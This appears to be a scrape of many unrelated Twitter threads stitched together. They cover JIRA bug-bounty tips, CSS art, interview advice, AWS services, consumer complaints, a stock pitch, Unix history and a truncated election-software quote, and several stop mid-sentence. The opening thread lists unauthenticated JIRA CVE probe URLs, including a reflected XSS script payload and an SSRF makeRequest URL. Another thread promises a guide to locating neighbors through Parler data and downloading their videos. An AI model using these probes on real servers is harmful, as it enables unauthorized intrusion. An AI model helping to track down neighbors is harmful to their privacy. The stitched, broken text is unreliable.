#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.

#BugBountyTips

(1/n)

(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to

Building Principles:

↓

1/

Value = doing things that other people don't do, won't do or can't do.

"You get paid in direct proportion to the difficulty of problems you solve" — Elon Musk

2/

Service is high-touch result generation (building experience), product is low-touch result generation (scaling experience).

3/

In a world of infinite distraction, focus is the only path to freedom.

4/

Sell time to buy experience, sell experience to buy time.

“If you don't find a way to make money while you sleep, you will work until you die.” — Warren Buffett

Let's create Phineas using CSS in few simple steps😄

THREAD🧵

STEP 1. Create a head

create a triangle and rotate it so that it looks like a head

STEP 2. Create smile and ear

We have a pseudo elements in CSS, so we can create smile and ear using head::after and head::before

STEP 3. Create eyes

This is the most trickiest part because in order to make an eye we have to create

- One bigger white circle
- then a small black pupil inside white circle
- then a small white reflection in black pupil

Let's create a outer white circle first

STEP 3(I). Create a black pupil

We can create pupil using pseudo element

Software engineering interview experiences don't have to be terrible.

Thread on my best software engineering interview experience.
👇🏼 (Thanks @PaulYacoubian for the idea)

Starting from the top of the funnel, I heard of this company (fintech startup, close to $1b valuation, based in NYC) from a podcast they were advertising on, and I liked the mission.

I went to their website and applied.

Their application portal used greenhouse. One page and no need for re-typing resume info.

They had an open field that said "Tell me something we should know about you".

I wrote about how I was a career switcher, had kids, went to school while working full time, etc.

Here's where they started to stand out.

They emailed me back a few days later and sent me a calendly link to schedule my first interview.

Letting the candidate choose a time for an interview is a small detail but is great for reducing candidate stress.

I scheduled my first interview. I received an email detailing what the interview would be about, what to expect, and what to prepare for. It would be a casual chat.

My interviewer mentioned and asked tons of questions about the free-response field I had filled out earlier.

If you missed @clare_liguori's Continuous Delivery session this week (like I did) then good news, it's available on-demand now 🎊

https://t.co/78b8sI2hHs

And here's my play-by-play for the session

🧵...

This is a typical CD pipeline in AWS.

This is far more complex than the most complex CD pipeline I have ever had! Just cos it's complex, doesn't mean it's over-engineered though. Given the blast radius, I'm glad they do releases carefully and safely.

If you look closely, beyond all the alpha, beta, gamma environments, it's one-box in a region first then the rest of the region, I assume starting with the least risky regions first.

For anyone thinking about going multi-region (after the recent Kinesis outage), this is one of the complexities you need to consider. To do multi-region right and deploy safely (minimize blast radius), this is one of the complexities you have to factor in.

This "deploy small at first then more broadly" principle applies to #serverless apps too, though you can't "deploy to one box". You can do it with canary deployments instead, CodeDeploy supports this practice for Lambda (using weighted aliases) out-of-the-box.

It's incredibly hard to become a customer of @Telstra so you can give them money. They absolutely despise money, and do everything in their power to erect as many obstacles as possible in the way of a normal person establishing a billing relationship with them.

First: "I'd like to buy a 4G WiFi hotspot please."
"Umm, we don't have any. Maybe try K-Mart."

Are you serious? You can't sell me a mobile broadband service, and you'd prefer me to go to a department store. Okay...

So I go to the department store, and they have the same Telstra product $20 cheaper than Telstra does.

Go to activate it. Error message, SIM serial number has already been activated. Well goddamn.

So, back to the @Telstra shop. "Yes, I know I can return the whole thing, but all I want is a $2 SIM to get started. Can you just sell me one of those?"

No. They don't have any. Zero SIMs in the store.

ARE YOU KIDDING ME? WHAT OTHER PURPOSE DOES A TELSTRA SHOP HAVE?

Their first suggestion was to buy one from @AusPost, but they take 24 hours to activate their prepaid SIMs. Maybe try Woolies?

🚨 $PSKY MedTech 🚨

🩺 Provides a healthcare CRM software

📈 Sales are set to grow by 38% YoY from 2020 to 2021

⚡️ Developing a platform for third-parties to commercialise their MedTech apps and integrate these with PatientSky’s software

✅ Becoming a Platform-as-a-Service

PatientSky $PSKY.OL was founded in 2014 in Norway and started as a patient administration tool for clinics

🩺 It serves as a platform for ordering appointments, prescriptions, video consultations and e-consultations

The solution grew rapidly from 100.000 to 1.8m app downloads in less than 4 years

🥼 And it added a myriad of possibilities along the way, starting from a simple EHR management tool to a MedTech platform

1️⃣ By 2016 it counted 100k downloads and had morphed into a SaaS tool offering a task scheduler, internet connectivity and a VOIP module

2️⃣ By 2019, it counted over 1m app downloads and added an insurance module, Electronic Health Records (EHR) and a medication tool

✨ The company also introduced a Platform-as-a-Service tool, enabling its customers to build their own medical apps on top of PatientSky’s platform

3️⃣ By 2020, it expanded into hospitals and counted over 1.8m app downloads

Found your neighbor on Parler map and want to see what video they posted, here's how.

Here is an easy to follow step by step guide on how to locate your neighbors who used Parler and then view and Download the videos they posted. A thread.

How should one approach System Design questions during an interview?

Here's the step by step guide:

🧵👇🏻

System design interviews are generally open ended discussions. There's no one right answer.

The main focus in this round is to see your thought process and whether you'll be able to design a minimal system keeping future scale in mind and by following the standard principles.

Know that many interviewers deliberately make it hard to see how you approach a given problem.

You cannot possibly design a complex system in 1-2 hours which engineers usually take months to years to design, develop and build.

So this is how you should approach this round:

1. Clarify the requirements: As mentioned earlier the questions are generally very open ended. So you need to ask a lot of question to set the scope clear for the discussion.

Example: "Design an application like Twitter"

Twitter has a lot of features like:
- Post tweet
- Home timeline
- Profile timeline
- Analytics
- Likes
- Retweets
- Following
- Bookmark
- Trending etc

You get the idea!

now that's a title screen

foolish people like to quote that "science says there are only two genders". This is incorrect.

Science instead says that in addition to the regular genders, there are 25 Science Genders, shown here. (tag yourself I'm Skull)

I have no idea how to continue with this game.
I clicked a bunch of things and the game just pauses for a second, except when I clicked electron it animated and then was replaced by... something

Quarky & Quaysoo's Turbo Science!

Turbo Science is like regular Science, but FASTER

oh I see

is this Gizmos and Gadgets but by Sierra?

One of the big promises of software is composability. You can build rich, powerful experiences out of basic building blocks.

APIs add new things to the toolbox. For example: Treasury, which lets an app/platform store, move, and track a business’

I've been a small business owner and can talk at length about SMB banking, and will later, but let's put on the software developer hat right now.

Lots of software talks about money, keeps records about money, does calculations about money, but can't *touch* money.

This is extremely frustrating when you're building SaaS apps for businesses, because you have total control over your UX right until your app needs to touch money... at which point all data about it lives in a silo you can't access.

So you generally push work to the operator.

For example, suppose you’re writing a business-in-a-box system for electricians, including an invoicing feature.

You need to be able to read bank transactions to reconcile. You probably can't. The owner can. So you ask the owner to do mind-numbing work a computer does better.

It sure would be great if your business customers had bank accounts you could actually introspect and operate on their behalves! You could just get the list of incoming payments and match against the invoices.

There is some software to write but it is not rocket science.

1. in the beginning, browsers didn't have download statusbars
2. firefox got a browser statusbar extension. it was configurable and worked well
3. chrome cloned it without options and it didn't work as well

4. firefox realized chrome was faster and more secure at everything and therefore dropped extensions
5. now firefox doesn't have a download statusbar either

6. someone reimplements download statusbars in firefox's new web-extensions format. it's terrible because of the inherent limitations of the significantly less flexible and powerful extension format

7. CHROME WINS! (with its terrible download statusbar implementation which can't be fixed by users, because No Options and No Skins and No Extensions)

this is where we are now

1/ In early 2004 we were heads down executing on Edit and Continue across a large contingent of teams. There had been several iterations of scoping, redesigns, and customer feedback.

2/ We had a weekly meeting every Thursday morning when representatives from each of the teams would get together and review progress. It was fairly heavy weight, but there were so many teams involved that it was necessary to have a regular sync.

3/ Regardless, E&C was coalescing, but teams were stretched thin working diligently to enable scenarios, improve performance, fix bugs, etc. It had been a month or so since we decided to add support for C# to the matrix as well, so folks were a bit stressed.

4/ That set the stage for the meeting that we had on the first Thursday in April. A debugger PM named Habib Heydarian ran the meeting and after a brief intro he gave me a ring to come in and present.

5/ I walked in and handed out a document that I had written up, titled DCR: C# Edit and Continue for Venus. DCR meant design change request, and Venus was the design-time code name for ASP .NET support.

It’s been a minute since I’ve written code. So, I figured that now might be a good time to start learning how to use the Blueprint system in #UnrealEngine. I felt that it’d be interesting to share my progress and mistakes. So here goes!
🧵

1.
Firstly, I made use of the auto-rigging feature in Mixamo to give my character a skeleton. This allows you to use the Mixamo animations for the character in Unreal Engine.

2.
In the Animation Blueprint, I tried to add a punching state to the character. The problem I faced initially was that the character glides while punching. This occurs because multiple states of the animation are active (as their transition conditions are satisfied).

3.
There are a couple of solutions for this:

👉Blending the punch and idle states (character can punch while running) by using the Layered Blend Per Bone node.

👉Disabling input while the punch occurs.

4.
I didn’t like the outcome when I blended the animations. as the hip rotates more than we’d like it to. This leads to the character punching upwards and to the left. This isn’t favorable as the enemy is usually straight ahead. Disabling the input worked way better!

I'm pretty sure whoever designed this control usually makes gender selectors for websites...

Poly Bridge has a language SLIDER.

all languages exist on a spectrum from English to 한국어

next I want to see a game with a "choose language" button and it brings up this language map like it's a skill tree

gonna spend 200 XP to unlock Tamil

that's from

Facebook -- having taken out full-page ads in the NYT, Washington Post, and WSJ -- is generally seen as the primary victim of the new app privacy controls coming in iOS14. But Google is perhaps even more vulnerable to ATT. Why has Google remained silent? (1/X)

2/ First, background: here's a high-level overview of how ATT / IDFA deprecation impacts advertisers and ad networks, and why this whole ordeal has put advertisers and ad networks into a state of panic:

3/ Google is equally as susceptible to harm from ATT as Facebook. Google's UAC product -- esp its tROAS and tCPA campaign objectives -- relies as much on IDFA-indexed monetization and engagement data as FB's mobile product does. But Google has one big weakness wrt ATT: YouTube

4/ Broadly, view-through attribution accounts for a disproportionate % of conversions from YouTube app install impressions. This means: user sees the YT ad, doesnt click, downloads app later, & Google is able to claim it by reconciling IDFA seen at impression to IDFA seen in app

5/ View-through attribution is nonexistent in the ATT paradigm as it relies on the IDFA; some significant portion of YT's attributed conversions will evaporate. So why isnt Google vocally opposing ATT? Two reasons: consumer optics and its duality as ad network / mobile platform

@mattblaze AFAIK the only group to discover Ken’s hack was us in PWB/UNIX. One of the other guys noticed C prepreprocessor had gotten bigger, looked at binary namelist, found symbol not in source code. I got onto Ken’s system, found the code, very clever.

A bit latet, I was in Lab 127’s terminal room, talking to dmr or bwk, and overheard amusing conversation between ken and Robert Morris Sr, who sometimes consulted for NSA.
(RM Jr of worm fame was just a kid then.)

They were chortling away over cleverness of exploit. Then one (must have been ken) said “think we could put this over on NSA?” (which already had UNIX systems... we did favors now and then).
More chortling, then (must have been Bob): uhh, NSA really doesn’t have sense of humor.

PWB crew ran 1st real UNIX computer center & we were hyper-sensitive, partly because someone had called at night, told operator he was Ken Thompson & needed root password ... and got it. Turned out to be high schooler ... proving that social engineering tactics have been eternal.

Years later, as many BTL Directors were buying PDP11-70s for labs as general service systems, some PWB crew were asked to do security audits, given experience running biggest UNIX site. One lab was very proud of enhanced password software.
We did audit, agreed with that, BUT:

Most commonly used AWS services:

🧵👇🏻

1. Elastic Compute Cloud (EC2):

EC2 instances are basically servers with an operating system which can be used to run your applications on the internet just like you run your applications on your laptop during development.

2. Relational Database Service (RDS):

RDS is a distributed relational database service.

Amazon RDS is available on several database instance types - optimised for memory, performance or I/O - and provides six familiar database engines to choose from, including:

- Amazon Aurora
- PostgreSQL
- MySQL
- MariaDB
- Oracle Database
- SQL Server

3. Elastic Container Service (ECS):

AWS ECS is a fully managed container orchestration service.

ECS has been a foundational pillar for key Amazon services and it can natively integrate with other services such as Amazon Route 53, Secrets Manager, AWS Identity and
...

Oct 1, 2020 - Fulton CTY
"Mr. Gilstrap stated that he did not feel comfortable installing a last-minute software change, and did not want Fulton County staff to be responsible for installing it. He told us that he told Dominion to conduct this